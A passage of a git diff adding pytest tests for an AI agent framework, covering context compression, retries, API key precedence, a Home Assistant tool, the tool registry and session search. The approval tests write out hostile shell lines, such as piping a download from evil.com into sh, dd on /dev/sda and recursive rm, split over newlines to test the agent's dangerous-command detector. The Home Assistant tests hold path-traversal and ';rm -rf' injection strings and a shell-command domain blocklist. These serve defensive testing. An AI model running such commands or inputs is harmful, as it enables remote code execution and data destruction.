+            {"role": "user", "content": "hi"},
+            {"role": "assistant", "content": "hello"},
+        ]
+
+        ok_resp = _mock_response(content="No compression needed", finish_reason="stop")
+        agent.client.chat.completions.create.side_effect = [ok_resp]
+
+        with (
+            patch.object(agent, "_compress_context") as mock_compress,
+            patch.object(agent, "_persist_session"),
+            patch.object(agent, "_save_trajectory"),
+            patch.object(agent, "_cleanup_task_resources"),
+        ):
+            result = agent.run_conversation("hello", conversation_history=small_history)
+
+        mock_compress.assert_not_called()
+        assert result["completed"] is True
+
+    def test_no_preflight_when_compression_disabled(self, agent):
+        """Preflight should not run when compression is disabled."""
+        agent.compression_enabled = False
+        agent.context_compressor.context_length = 100
+        agent.context_compressor.threshold_tokens = 85
+
+        big_history = [
+            {"role": "user", "content": "x" * 1000},
+            {"role": "assistant", "content": "y" * 1000},
+        ] * 10
+
+        ok_resp = _mock_response(content="OK", finish_reason="stop")
+        agent.client.chat.completions.create.side_effect = [ok_resp]
+
+        with (
+            patch.object(agent, "_compress_context") as mock_compress,
+            patch.object(agent, "_persist_session"),
+            patch.object(agent, "_save_trajectory"),
+            patch.object(agent, "_cleanup_task_resources"),
+        ):
+            result = agent.run_conversation("hello", conversation_history=big_history)
+
+        mock_compress.assert_not_called()
--- a/tests/test_honcho_client_config.py
+++ b/tests/test_honcho_client_config.py
@@ -0,0 +1,105 @@
+"""Tests for Honcho client configuration."""
+
+import json
+import os
+import tempfile
+from pathlib import Path
+
+import pytest
+
+from honcho_integration.client import HonchoClientConfig
+
+
+class TestHonchoClientConfigAutoEnable:
+    """Test auto-enable behavior when API key is present."""
+
+    def test_auto_enables_when_api_key_present_no_explicit_enabled(self, tmp_path):
+        """When API key exists and enabled is not set, should auto-enable."""
+        config_path = tmp_path / "config.json"
+        config_path.write_text(json.dumps({
+            "apiKey": "test-api-key-12345",
+            # Note: no "enabled" field
+        }))
+
+        cfg = HonchoClientConfig.from_global_config(config_path=config_path)
+
+        assert cfg.api_key == "test-api-key-12345"
+        assert cfg.enabled is True  # Auto-enabled because API key exists
+
+    def test_respects_explicit_enabled_false(self, tmp_path):
+        """When enabled is explicitly False, should stay disabled even with API key."""
+        config_path = tmp_path / "config.json"
+        config_path.write_text(json.dumps({
+            "apiKey": "test-api-key-12345",
+            "enabled": False,  # Explicitly disabled
+        }))
+
+        cfg = HonchoClientConfig.from_global_config(config_path=config_path)
+
+        assert cfg.api_key == "test-api-key-12345"
+        assert cfg.enabled is False  # Respects explicit setting
+
+    def test_respects_explicit_enabled_true(self, tmp_path):
+        """When enabled is explicitly True, should be enabled."""
+        config_path = tmp_path / "config.json"
+        config_path.write_text(json.dumps({
+            "apiKey": "test-api-key-12345",
+            "enabled": True,
+        }))
+
+        cfg = HonchoClientConfig.from_global_config(config_path=config_path)
+
+        assert cfg.api_key == "test-api-key-12345"
+        assert cfg.enabled is True
+
+    def test_disabled_when_no_api_key_and_no_explicit_enabled(self, tmp_path):
+        """When no API key and enabled not set, should be disabled."""
+        config_path = tmp_path / "config.json"
+        config_path.write_text(json.dumps({
+            "workspace": "test",
+            # No apiKey, no enabled
+        }))
+
+        # Clear env var if set
+        env_key = os.environ.pop("HONCHO_API_KEY", None)
+        try:
+            cfg = HonchoClientConfig.from_global_config(config_path=config_path)
+            assert cfg.api_key is None
+            assert cfg.enabled is False  # No API key = not enabled
+        finally:
+            if env_key:
+                os.environ["HONCHO_API_KEY"] = env_key
+
+    def test_auto_enables_with_env_var_api_key(self, tmp_path, monkeypatch):
+        """When API key is in env var (not config), should auto-enable."""
+        config_path = tmp_path / "config.json"
+        config_path.write_text(json.dumps({
+            "workspace": "test",
+            # No apiKey in config
+        }))
+
+        monkeypatch.setenv("HONCHO_API_KEY", "env-api-key-67890")
+
+        cfg = HonchoClientConfig.from_global_config(config_path=config_path)
+
+        assert cfg.api_key == "env-api-key-67890"
+        assert cfg.enabled is True  # Auto-enabled from env var API key
+
+    def test_from_env_always_enabled(self, monkeypatch):
+        """from_env() should always set enabled=True."""
+        monkeypatch.setenv("HONCHO_API_KEY", "env-test-key")
+
+        cfg = HonchoClientConfig.from_env()
+
+        assert cfg.api_key == "env-test-key"
+        assert cfg.enabled is True
+
+    def test_falls_back_to_env_when_no_config_file(self, tmp_path, monkeypatch):
+        """When config file doesn't exist, should fall back to from_env()."""
+        nonexistent = tmp_path / "nonexistent.json"
+        monkeypatch.setenv("HONCHO_API_KEY", "fallback-key")
+
+        cfg = HonchoClientConfig.from_global_config(config_path=nonexistent)
+
+        assert cfg.api_key == "fallback-key"
+        assert cfg.enabled is True  # from_env() sets enabled=True
--- a/tests/test_run_agent.py
+++ b/tests/test_run_agent.py
@@ -546,6 +546,24 @@ class TestBuildAssistantMessage:
        result = agent._build_assistant_message(msg, "stop")
        assert result["content"] == ""

+    def test_tool_call_extra_content_preserved(self, agent):
+        """Gemini thinking models attach extra_content with thought_signature
+        to tool calls. This must be preserved so subsequent API calls include it."""
+        tc = _mock_tool_call(name="get_weather", arguments='{"city":"NYC"}', call_id="c2")
+        tc.extra_content = {"google": {"thought_signature": "abc123"}}
+        msg = _mock_assistant_msg(content="", tool_calls=[tc])
+        result = agent._build_assistant_message(msg, "tool_calls")
+        assert result["tool_calls"][0]["extra_content"] == {
+            "google": {"thought_signature": "abc123"}
+        }
+
+    def test_tool_call_without_extra_content(self, agent):
+        """Standard tool calls (no thinking model) should not have extra_content."""
+        tc = _mock_tool_call(name="web_search", arguments='{}', call_id="c3")
+        msg = _mock_assistant_msg(content="", tool_calls=[tc])
+        result = agent._build_assistant_message(msg, "tool_calls")
+        assert "extra_content" not in result["tool_calls"][0]
+

 class TestFormatToolsForSystemMessage:
    def test_no_tools_returns_empty_array(self, agent):
@@ -758,3 +776,140 @@ class TestRunConversation:
            )
            result = agent.run_conversation("search something")
        mock_compress.assert_called_once()
+
+
+class TestRetryExhaustion:
+    """Regression: retry_count > max_retries was dead code (off-by-one).
+
+    When retries were exhausted the condition never triggered, causing
+    the loop to exit and fall through to response.choices[0] on an
+    invalid response, raising IndexError.
+    """
+
+    def _setup_agent(self, agent):
+        agent._cached_system_prompt = "You are helpful."
+        agent._use_prompt_caching = False
+        agent.tool_delay = 0
+        agent.compression_enabled = False
+        agent.save_trajectories = False
+
+    @staticmethod
+    def _make_fast_time_mock():
+        """Return a mock time module where sleep loops exit instantly."""
+        mock_time = MagicMock()
+        _t = [1000.0]
+
+        def _advancing_time():
+            _t[0] += 500.0  # jump 500s per call so sleep_end is always in the past
+            return _t[0]
+
+        mock_time.time.side_effect = _advancing_time
+        mock_time.sleep = MagicMock()  # no-op
+        mock_time.monotonic.return_value = 12345.0
+        return mock_time
+
+    def test_invalid_response_returns_error_not_crash(self, agent):
+        """Exhausted retries on invalid (empty choices) response must not IndexError."""
+        self._setup_agent(agent)
+        # Return response with empty choices every time
+        bad_resp = SimpleNamespace(
+            choices=[],
+            model="test/model",
+            usage=None,
+        )
+        agent.client.chat.completions.create.return_value = bad_resp
+        with (
+            patch.object(agent, "_persist_session"),
+            patch.object(agent, "_save_trajectory"),
+            patch.object(agent, "_cleanup_task_resources"),
+            patch("run_agent.time", self._make_fast_time_mock()),
+        ):
+            result = agent.run_conversation("hello")
+        assert result.get("failed") is True or result.get("completed") is False
+
+    def test_api_error_raises_after_retries(self, agent):
+        """Exhausted retries on API errors must raise, not fall through."""
+        self._setup_agent(agent)
+        agent.client.chat.completions.create.side_effect = RuntimeError("rate limited")
+        with (
+            patch.object(agent, "_persist_session"),
+            patch.object(agent, "_save_trajectory"),
+            patch.object(agent, "_cleanup_task_resources"),
+            patch("run_agent.time", self._make_fast_time_mock()),
+        ):
+            with pytest.raises(RuntimeError, match="rate limited"):
+                agent.run_conversation("hello")
+
+
+# ---------------------------------------------------------------------------
+# Flush sentinel leak
+# ---------------------------------------------------------------------------
+
+class TestFlushSentinelNotLeaked:
+    """_flush_sentinel must be stripped before sending messages to the API."""
+
+    def test_flush_sentinel_stripped_from_api_messages(self, agent_with_memory_tool):
+        """Verify _flush_sentinel is not sent to the API provider."""
+        agent = agent_with_memory_tool
+        agent._memory_store = MagicMock()
+        agent._memory_flush_min_turns = 1
+        agent._user_turn_count = 10
+        agent._cached_system_prompt = "system"
+
+        messages = [
+            {"role": "user", "content": "hello"},
+            {"role": "assistant", "content": "hi"},
+            {"role": "user", "content": "remember this"},
+        ]
+
+        # Mock the API to return a simple response (no tool calls)
+        mock_msg = SimpleNamespace(content="OK", tool_calls=None)
+        mock_choice = SimpleNamespace(message=mock_msg)
+        mock_response = SimpleNamespace(choices=[mock_choice])
+        agent.client.chat.completions.create.return_value = mock_response
+
+        # Bypass auxiliary client so flush uses agent.client directly
+        with patch("agent.auxiliary_client.get_text_auxiliary_client", return_value=(None, None)):
+            agent.flush_memories(messages, min_turns=0)
+
+        # Check what was actually sent to the API
+        call_args = agent.client.chat.completions.create.call_args
+        assert call_args is not None, "flush_memories never called the API"
+        api_messages = call_args.kwargs.get("messages") or call_args[1].get("messages")
+        for msg in api_messages:
+            assert "_flush_sentinel" not in msg, (
+                f"_flush_sentinel leaked to API in message: {msg}"
+            )
+
+
+# ---------------------------------------------------------------------------
+# Conversation history mutation
+# ---------------------------------------------------------------------------
+
+class TestConversationHistoryNotMutated:
+    """run_conversation must not mutate the caller's conversation_history list."""
+
+    def test_caller_list_unchanged_after_run(self, agent):
+        """Passing conversation_history should not modify the original list."""
+        history = [
+            {"role": "user", "content": "previous question"},
+            {"role": "assistant", "content": "previous answer"},
+        ]
+        original_len = len(history)
+
+        resp = _mock_response(content="new answer", finish_reason="stop")
+        agent.client.chat.completions.create.return_value = resp
+
+        with (
+            patch.object(agent, "_persist_session"),
+            patch.object(agent, "_save_trajectory"),
+            patch.object(agent, "_cleanup_task_resources"),
+        ):
+            result = agent.run_conversation("new question", conversation_history=history)
+
+        # Caller's list must be untouched
+        assert len(history) == original_len, (
+            f"conversation_history was mutated: expected {original_len} items, got {len(history)}"
+        )
+        # Result should have more messages than the original history
+        assert len(result["messages"]) > original_len
--- a/tests/test_runtime_provider_resolution.py
+++ b/tests/test_runtime_provider_resolution.py
@@ -89,6 +89,38 @@ def test_resolve_runtime_provider_auto_uses_custom_config_base_url(monkeypatch):
    assert resolved["base_url"] == "https://custom.example/v1"


+def test_openrouter_key_takes_priority_over_openai_key(monkeypatch):
+    """OPENROUTER_API_KEY should be used over OPENAI_API_KEY when both are set.
+
+    Regression test for #289: users with OPENAI_API_KEY in .bashrc had it
+    sent to OpenRouter instead of their OPENROUTER_API_KEY.
+    """
+    monkeypatch.setattr(rp, "resolve_provider", lambda *a, **k: "openrouter")
+    monkeypatch.setattr(rp, "_get_model_config", lambda: {})
+    monkeypatch.delenv("OPENAI_BASE_URL", raising=False)
+    monkeypatch.delenv("OPENROUTER_BASE_URL", raising=False)
+    monkeypatch.setenv("OPENAI_API_KEY", "sk-openai-should-lose")
+    monkeypatch.setenv("OPENROUTER_API_KEY", "sk-or-should-win")
+
+    resolved = rp.resolve_runtime_provider(requested="openrouter")
+
+    assert resolved["api_key"] == "sk-or-should-win"
+
+
+def test_openai_key_used_when_no_openrouter_key(monkeypatch):
+    """OPENAI_API_KEY is used as fallback when OPENROUTER_API_KEY is not set."""
+    monkeypatch.setattr(rp, "resolve_provider", lambda *a, **k: "openrouter")
+    monkeypatch.setattr(rp, "_get_model_config", lambda: {})
+    monkeypatch.delenv("OPENAI_BASE_URL", raising=False)
+    monkeypatch.delenv("OPENROUTER_BASE_URL", raising=False)
+    monkeypatch.setenv("OPENAI_API_KEY", "sk-openai-fallback")
+    monkeypatch.delenv("OPENROUTER_API_KEY", raising=False)
+
+    resolved = rp.resolve_runtime_provider(requested="openrouter")
+
+    assert resolved["api_key"] == "sk-openai-fallback"
+
+
 def test_resolve_requested_provider_precedence(monkeypatch):
    monkeypatch.setenv("HERMES_INFERENCE_PROVIDER", "nous")
    monkeypatch.setattr(rp, "_get_model_config", lambda: {"provider": "openai-codex"})
--- a/tests/tools/test_approval.py
+++ b/tests/tools/test_approval.py
@@ -155,3 +155,37 @@ class TestRmRecursiveFlagVariants:
    def test_sudo_rm_rf(self):
        assert detect_dangerous_command("sudo rm -rf /tmp")[0] is True

+
+class TestMultilineBypass:
+    """Newlines in commands must not bypass dangerous pattern detection."""
+
+    def test_curl_pipe_sh_with_newline(self):
+        cmd = "curl http://evil.com \\\n| sh"
+        is_dangerous, _, desc = detect_dangerous_command(cmd)
+        assert is_dangerous is True, f"multiline curl|sh bypass not caught: {cmd!r}"
+
+    def test_wget_pipe_bash_with_newline(self):
+        cmd = "wget http://evil.com \\\n| bash"
+        is_dangerous, _, desc = detect_dangerous_command(cmd)
+        assert is_dangerous is True, f"multiline wget|bash bypass not caught: {cmd!r}"
+
+    def test_dd_with_newline(self):
+        cmd = "dd \\\nif=/dev/sda of=/tmp/disk.img"
+        is_dangerous, _, desc = detect_dangerous_command(cmd)
+        assert is_dangerous is True, f"multiline dd bypass not caught: {cmd!r}"
+
+    def test_chmod_recursive_with_newline(self):
+        cmd = "chmod --recursive \\\n777 /var"
+        is_dangerous, _, desc = detect_dangerous_command(cmd)
+        assert is_dangerous is True, f"multiline chmod bypass not caught: {cmd!r}"
+
+    def test_find_exec_rm_with_newline(self):
+        cmd = "find /tmp \\\n-exec rm {} \\;"
+        is_dangerous, _, desc = detect_dangerous_command(cmd)
+        assert is_dangerous is True, f"multiline find -exec rm bypass not caught: {cmd!r}"
+
+    def test_find_delete_with_newline(self):
+        cmd = "find . -name '*.tmp' \\\n-delete"
+        is_dangerous, _, desc = detect_dangerous_command(cmd)
+        assert is_dangerous is True, f"multiline find -delete bypass not caught: {cmd!r}"
+
--- a/tests/tools/test_debug_helpers.py
+++ b/tests/tools/test_debug_helpers.py
@@ -26,9 +26,11 @@ class TestDebugSessionDisabled:

    def test_save_noop(self, tmp_path):
        ds = DebugSession("test_tool", env_var="FAKE_DEBUG_VAR_XYZ")
-        ds.log_dir = tmp_path
+        log_dir = tmp_path / "debug_logs"
+        log_dir.mkdir()
+        ds.log_dir = log_dir
        ds.save()
-        assert list(tmp_path.iterdir()) == []
+        assert list(log_dir.iterdir()) == []

    def test_get_session_info_disabled(self):
        ds = DebugSession("test_tool", env_var="FAKE_DEBUG_VAR_XYZ")
--- a/tests/tools/test_file_operations.py
+++ b/tests/tools/test_file_operations.py
@@ -67,10 +67,18 @@ class TestReadResult:
    def test_to_dict_omits_defaults(self):
        r = ReadResult()
        d = r.to_dict()
-        assert "content" not in d  # empty string omitted
        assert "error" not in d    # None omitted
        assert "similar_files" not in d  # empty list omitted

+    def test_to_dict_preserves_empty_content(self):
+        """Empty file should still have content key in the dict."""
+        r = ReadResult(content="", total_lines=0, file_size=0)
+        d = r.to_dict()
+        assert "content" in d
+        assert d["content"] == ""
+        assert d["total_lines"] == 0
+        assert d["file_size"] == 0
+
    def test_to_dict_includes_values(self):
        r = ReadResult(content="hello", total_lines=10, file_size=50, truncated=True)
        d = r.to_dict()
--- a/tests/tools/test_homeassistant_tool.py
+++ b/tests/tools/test_homeassistant_tool.py
@@ -0,0 +1,373 @@
+"""Tests for the Home Assistant tool module.
+
+Tests real logic: entity filtering, payload building, response parsing,
+handler validation, and availability gating.
+"""
+
+import json
+
+import pytest
+
+from tools.homeassistant_tool import (
+    _check_ha_available,
+    _filter_and_summarize,
+    _build_service_payload,
+    _parse_service_response,
+    _get_headers,
+    _handle_get_state,
+    _handle_call_service,
+    _BLOCKED_DOMAINS,
+    _ENTITY_ID_RE,
+)
+
+
+# ---------------------------------------------------------------------------
+# Sample HA state data (matches real HA /api/states response shape)
+# ---------------------------------------------------------------------------
+
+SAMPLE_STATES = [
+    {"entity_id": "light.bedroom", "state": "on", "attributes": {"friendly_name": "Bedroom Light", "brightness": 200}},
+    {"entity_id": "light.kitchen", "state": "off", "attributes": {"friendly_name": "Kitchen Light"}},
+    {"entity_id": "switch.fan", "state": "on", "attributes": {"friendly_name": "Living Room Fan"}},
+    {"entity_id": "sensor.temperature", "state": "22.5", "attributes": {"friendly_name": "Kitchen Temperature", "unit_of_measurement": "C"}},
+    {"entity_id": "climate.thermostat", "state": "heat", "attributes": {"friendly_name": "Main Thermostat", "current_temperature": 21}},
+    {"entity_id": "binary_sensor.motion", "state": "off", "attributes": {"friendly_name": "Hallway Motion"}},
+    {"entity_id": "sensor.humidity", "state": "55", "attributes": {"friendly_name": "Bedroom Humidity", "area": "bedroom"}},
+]
+
+
+# ---------------------------------------------------------------------------
+# Entity filtering and summarization
+# ---------------------------------------------------------------------------
+
+
+class TestFilterAndSummarize:
+    def test_no_filters_returns_all(self):
+        result = _filter_and_summarize(SAMPLE_STATES)
+        assert result["count"] == 7
+        ids = {e["entity_id"] for e in result["entities"]}
+        assert "light.bedroom" in ids
+        assert "climate.thermostat" in ids
+
+    def test_domain_filter_lights(self):
+        result = _filter_and_summarize(SAMPLE_STATES, domain="light")
+        assert result["count"] == 2
+        for e in result["entities"]:
+            assert e["entity_id"].startswith("light.")
+
+    def test_domain_filter_sensor(self):
+        result = _filter_and_summarize(SAMPLE_STATES, domain="sensor")
+        assert result["count"] == 2
+        ids = {e["entity_id"] for e in result["entities"]}
+        assert ids == {"sensor.temperature", "sensor.humidity"}
+
+    def test_domain_filter_no_matches(self):
+        result = _filter_and_summarize(SAMPLE_STATES, domain="media_player")
+        assert result["count"] == 0
+        assert result["entities"] == []
+
+    def test_area_filter_by_friendly_name(self):
+        result = _filter_and_summarize(SAMPLE_STATES, area="kitchen")
+        assert result["count"] == 2
+        ids = {e["entity_id"] for e in result["entities"]}
+        assert "light.kitchen" in ids
+        assert "sensor.temperature" in ids
+
+    def test_area_filter_by_area_attribute(self):
+        result = _filter_and_summarize(SAMPLE_STATES, area="bedroom")
+        ids = {e["entity_id"] for e in result["entities"]}
+        # "Bedroom Light" matches via friendly_name, "Bedroom Humidity" matches via area attr
+        assert "light.bedroom" in ids
+        assert "sensor.humidity" in ids
+
+    def test_area_filter_case_insensitive(self):
+        result = _filter_and_summarize(SAMPLE_STATES, area="KITCHEN")
+        assert result["count"] == 2
+
+    def test_combined_domain_and_area(self):
+        result = _filter_and_summarize(SAMPLE_STATES, domain="sensor", area="kitchen")
+        assert result["count"] == 1
+        assert result["entities"][0]["entity_id"] == "sensor.temperature"
+
+    def test_summary_includes_friendly_name(self):
+        result = _filter_and_summarize(SAMPLE_STATES, domain="climate")
+        assert result["entities"][0]["friendly_name"] == "Main Thermostat"
+        assert result["entities"][0]["state"] == "heat"
+
+    def test_empty_states_list(self):
+        result = _filter_and_summarize([])
+        assert result["count"] == 0
+
+    def test_missing_attributes_handled(self):
+        states = [{"entity_id": "light.x", "state": "on"}]
+        result = _filter_and_summarize(states)
+        assert result["count"] == 1
+        assert result["entities"][0]["friendly_name"] == ""
+
+
+# ---------------------------------------------------------------------------
+# Service payload building
+# ---------------------------------------------------------------------------
+
+
+class TestBuildServicePayload:
+    def test_entity_id_only(self):
+        payload = _build_service_payload(entity_id="light.bedroom")
+        assert payload == {"entity_id": "light.bedroom"}
+
+    def test_data_only(self):
+        payload = _build_service_payload(data={"brightness": 255})
+        assert payload == {"brightness": 255}
+
+    def test_entity_id_and_data(self):
+        payload = _build_service_payload(
+            entity_id="light.bedroom",
+            data={"brightness": 200, "color_name": "blue"},
+        )
+        assert payload["entity_id"] == "light.bedroom"
+        assert payload["brightness"] == 200
+        assert payload["color_name"] == "blue"
+
+    def test_no_args_returns_empty(self):
+        payload = _build_service_payload()
+        assert payload == {}
+
+    def test_entity_id_param_takes_precedence_over_data(self):
+        payload = _build_service_payload(
+            entity_id="light.a",
+            data={"entity_id": "light.b"},
+        )
+        # explicit entity_id parameter wins over data["entity_id"]
+        assert payload["entity_id"] == "light.a"
+
+
+# ---------------------------------------------------------------------------
+# Service response parsing
+# ---------------------------------------------------------------------------
+
+
+class TestParseServiceResponse:
+    def test_list_response_extracts_entities(self):
+        ha_response = [
+            {"entity_id": "light.bedroom", "state": "on", "attributes": {}},
+            {"entity_id": "light.kitchen", "state": "on", "attributes": {}},
+        ]
+        result = _parse_service_response("light", "turn_on", ha_response)
+        assert result["success"] is True
+        assert result["service"] == "light.turn_on"
+        assert len(result["affected_entities"]) == 2
+        assert result["affected_entities"][0]["entity_id"] == "light.bedroom"
+
+    def test_empty_list_response(self):
+        result = _parse_service_response("scene", "turn_on", [])
+        assert result["success"] is True
+        assert result["affected_entities"] == []
+
+    def test_non_list_response(self):
+        # Some HA services return a dict instead of a list
+        result = _parse_service_response("script", "run", {"result": "ok"})
+        assert result["success"] is True
+        assert result["affected_entities"] == []
+
+    def test_none_response(self):
+        result = _parse_service_response("automation", "trigger", None)
+        assert result["success"] is True
+        assert result["affected_entities"] == []
+
+    def test_service_name_format(self):
+        result = _parse_service_response("climate", "set_temperature", [])
+        assert result["service"] == "climate.set_temperature"
+
+
+# ---------------------------------------------------------------------------
+# Handler validation (no mocks - these paths don't reach the network)
+# ---------------------------------------------------------------------------
+
+
+class TestHandlerValidation:
+    def test_get_state_missing_entity_id(self):
+        result = json.loads(_handle_get_state({}))
+        assert "error" in result
+        assert "entity_id" in result["error"]
+
+    def test_get_state_empty_entity_id(self):
+        result = json.loads(_handle_get_state({"entity_id": ""}))
+        assert "error" in result
+
+    def test_call_service_missing_domain(self):
+        result = json.loads(_handle_call_service({"service": "turn_on"}))
+        assert "error" in result
+        assert "domain" in result["error"]
+
+    def test_call_service_missing_service(self):
+        result = json.loads(_handle_call_service({"domain": "light"}))
+        assert "error" in result
+        assert "service" in result["error"]
+
+    def test_call_service_missing_both(self):
+        result = json.loads(_handle_call_service({}))
+        assert "error" in result
+
+    def test_call_service_empty_strings(self):
+        result = json.loads(_handle_call_service({"domain": "", "service": ""}))
+        assert "error" in result
+
+
+# ---------------------------------------------------------------------------
+# Security: domain blocklist
+# ---------------------------------------------------------------------------
+
+
+class TestDomainBlocklist:
+    """Verify dangerous HA service domains are blocked."""
+
+    @pytest.mark.parametrize("domain", sorted(_BLOCKED_DOMAINS))
+    def test_blocked_domain_rejected(self, domain):
+        result = json.loads(_handle_call_service({
+            "domain": domain, "service": "any_service"
+        }))
+        assert "error" in result
+        assert "blocked" in result["error"].lower()
+
+    def test_safe_domain_not_blocked(self):
+        """Safe domains like 'light' should not be blocked (will fail on network, not blocklist)."""
+        # This will try to make a real HTTP call and fail, but the important thing
+        # is it does NOT return a "blocked" error
+        result = json.loads(_handle_call_service({
+            "domain": "light", "service": "turn_on", "entity_id": "light.test"
+        }))
+        # Should fail with a network/connection error, not a "blocked" error
+        if "error" in result:
+            assert "blocked" not in result["error"].lower()
+
+    def test_blocked_domains_include_shell_command(self):
+        assert "shell_command" in _BLOCKED_DOMAINS
+
+    def test_blocked_domains_include_hassio(self):
+        assert "hassio" in _BLOCKED_DOMAINS
+
+    def test_blocked_domains_include_rest_command(self):
+        assert "rest_command" in _BLOCKED_DOMAINS
+
+
+# ---------------------------------------------------------------------------
+# Security: entity_id validation
+# ---------------------------------------------------------------------------
+
+
+class TestEntityIdValidation:
+    """Verify entity_id format validation prevents path traversal."""
+
+    def test_valid_entity_id_accepted(self):
+        assert _ENTITY_ID_RE.match("light.bedroom")
+        assert _ENTITY_ID_RE.match("sensor.temperature_1")
+        assert _ENTITY_ID_RE.match("binary_sensor.motion")
+        assert _ENTITY_ID_RE.match("climate.main_thermostat")
+
+    def test_path_traversal_rejected(self):
+        assert _ENTITY_ID_RE.match("../../config") is None
+        assert _ENTITY_ID_RE.match("light/../../../etc/passwd") is None
+        assert _ENTITY_ID_RE.match("../api/config") is None
+
+    def test_special_chars_rejected(self):
+        assert _ENTITY_ID_RE.match("light.bed room") is None  # space
+        assert _ENTITY_ID_RE.match("light.bed;rm -rf") is None  # semicolon
+        assert _ENTITY_ID_RE.match("light.bed/room") is None  # slash
+        assert _ENTITY_ID_RE.match("LIGHT.BEDROOM") is None  # uppercase
+
+    def test_missing_domain_rejected(self):
+        assert _ENTITY_ID_RE.match(".bedroom") is None
+        assert _ENTITY_ID_RE.match("bedroom") is None
+
+    def test_get_state_rejects_invalid_entity_id(self):
+        result = json.loads(_handle_get_state({"entity_id": "../../config"}))
+        assert "error" in result
+        assert "Invalid entity_id" in result["error"]
+
+    def test_call_service_rejects_invalid_entity_id(self):
+        result = json.loads(_handle_call_service({
+            "domain": "light",
+            "service": "turn_on",
+            "entity_id": "../../../etc/passwd",
+        }))
+        assert "error" in result
+        assert "Invalid entity_id" in result["error"]
+
+    def test_call_service_allows_no_entity_id(self):
+        """Some services (like scene.turn_on) don't need entity_id."""
+        # Will fail on network, but should NOT fail on entity_id validation
+        result = json.loads(_handle_call_service({
+            "domain": "scene", "service": "turn_on"
+        }))
+        if "error" in result:
+            assert "Invalid entity_id" not in result["error"]
+
+
+# ---------------------------------------------------------------------------
+# Availability check
+# ---------------------------------------------------------------------------
+
+
+class TestCheckAvailable:
+    def test_unavailable_without_token(self, monkeypatch):
+        monkeypatch.delenv("HASS_TOKEN", raising=False)
+        assert _check_ha_available() is False
+
+    def test_available_with_token(self, monkeypatch):
+        monkeypatch.setenv("HASS_TOKEN", "eyJ0eXAiOiJKV1Q")
+        assert _check_ha_available() is True
+
+    def test_empty_token_is_unavailable(self, monkeypatch):
+        monkeypatch.setenv("HASS_TOKEN", "")
+        assert _check_ha_available() is False
+
+
+# ---------------------------------------------------------------------------
+# Auth headers
+# ---------------------------------------------------------------------------
+
+
+class TestGetHeaders:
+    def test_bearer_token_format(self, monkeypatch):
+        monkeypatch.setattr("tools.homeassistant_tool._HASS_TOKEN", "my-secret-token")
+        headers = _get_headers()
+        assert headers["Authorization"] == "Bearer my-secret-token"
+        assert headers["Content-Type"] == "application/json"
+
+
+# ---------------------------------------------------------------------------
+# Registry integration
+# ---------------------------------------------------------------------------
+
+
+class TestRegistration:
+    def test_tools_registered_in_registry(self):
+        from tools.registry import registry
+
+        names = registry.get_all_tool_names()
+        assert "ha_list_entities" in names
+        assert "ha_get_state" in names
+        assert "ha_call_service" in names
+
+    def test_tools_in_homeassistant_toolset(self):
+        from tools.registry import registry
+
+        toolset_map = registry.get_tool_to_toolset_map()
+        for tool in ("ha_list_entities", "ha_get_state", "ha_call_service"):
+            assert toolset_map[tool] == "homeassistant"
+
+    def test_check_fn_gates_availability(self, monkeypatch):
+        """Registry should exclude HA tools when HASS_TOKEN is not set."""
+        from tools.registry import registry
+
+        monkeypatch.delenv("HASS_TOKEN", raising=False)
+        defs = registry.get_definitions({"ha_list_entities", "ha_get_state", "ha_call_service"})
+        assert len(defs) == 0
+
+    def test_check_fn_includes_when_token_set(self, monkeypatch):
+        """Registry should include HA tools when HASS_TOKEN is set."""
+        from tools.registry import registry
+
+        monkeypatch.setenv("HASS_TOKEN", "test-token")
+        defs = registry.get_definitions({"ha_list_entities", "ha_get_state", "ha_call_service"})
+        assert len(defs) == 3
--- a/tests/tools/test_mcp_tool.py
+++ b/tests/tools/test_mcp_tool.py
--- a/tests/tools/test_registry.py
+++ b/tests/tools/test_registry.py
@@ -119,3 +119,57 @@ class TestToolsetAvailability:
        result = json.loads(reg.dispatch("bad", {}))
        assert "error" in result
        assert "RuntimeError" in result["error"]
+
+
+class TestCheckFnExceptionHandling:
+    """Verify that a raising check_fn is caught rather than crashing."""
+
+    def test_is_toolset_available_catches_exception(self):
+        reg = ToolRegistry()
+        reg.register(
+            name="t",
+            toolset="broken",
+            schema=_make_schema(),
+            handler=_dummy_handler,
+            check_fn=lambda: 1 / 0,  # ZeroDivisionError
+        )
+        # Should return False, not raise
+        assert reg.is_toolset_available("broken") is False
+
+    def test_check_toolset_requirements_survives_raising_check(self):
+        reg = ToolRegistry()
+        reg.register(name="a", toolset="good", schema=_make_schema(), handler=_dummy_handler, check_fn=lambda: True)
+        reg.register(name="b", toolset="bad", schema=_make_schema(), handler=_dummy_handler, check_fn=lambda: (_ for _ in ()).throw(ImportError("no module")))
+
+        reqs = reg.check_toolset_requirements()
+        assert reqs["good"] is True
+        assert reqs["bad"] is False
+
+    def test_get_definitions_skips_raising_check(self):
+        reg = ToolRegistry()
+        reg.register(
+            name="ok_tool",
+            toolset="s",
+            schema=_make_schema("ok_tool"),
+            handler=_dummy_handler,
+            check_fn=lambda: True,
+        )
+        reg.register(
+            name="bad_tool",
+            toolset="s2",
+            schema=_make_schema("bad_tool"),
+            handler=_dummy_handler,
+            check_fn=lambda: (_ for _ in ()).throw(OSError("network down")),
+        )
+        defs = reg.get_definitions({"ok_tool", "bad_tool"})
+        assert len(defs) == 1
+        assert defs[0]["function"]["name"] == "ok_tool"
+
+    def test_check_tool_availability_survives_raising_check(self):
+        reg = ToolRegistry()
+        reg.register(name="a", toolset="works", schema=_make_schema(), handler=_dummy_handler, check_fn=lambda: True)
+        reg.register(name="b", toolset="crashes", schema=_make_schema(), handler=_dummy_handler, check_fn=lambda: 1 / 0)
+
+        available, unavailable = reg.check_tool_availability()
+        assert "works" in available
+        assert any(u["name"] == "crashes" for u in unavailable)
--- a/tests/tools/test_session_search.py
+++ b/tests/tools/test_session_search.py
@@ -145,3 +145,62 @@ class TestSessionSearch:
        mock_db = object()
        result = json.loads(session_search(query="   ", db=mock_db))
        assert result["success"] is False
+
+    def test_current_session_excluded(self):
+        """session_search should never return the current session."""
+        from unittest.mock import MagicMock
+        from tools.session_search_tool import session_search
+
+        mock_db = MagicMock()
+        current_sid = "20260304_120000_abc123"
+
+        # Simulate FTS5 returning matches only from the current session
+        mock_db.search_messages.return_value = [
+            {"session_id": current_sid, "content": "test match", "source": "cli",
+             "session_started": 1709500000, "model": "test"},
+        ]
+        mock_db.get_session.return_value = {"parent_session_id": None}
+
+        result = json.loads(session_search(
+            query="test", db=mock_db, current_session_id=current_sid,
+        ))
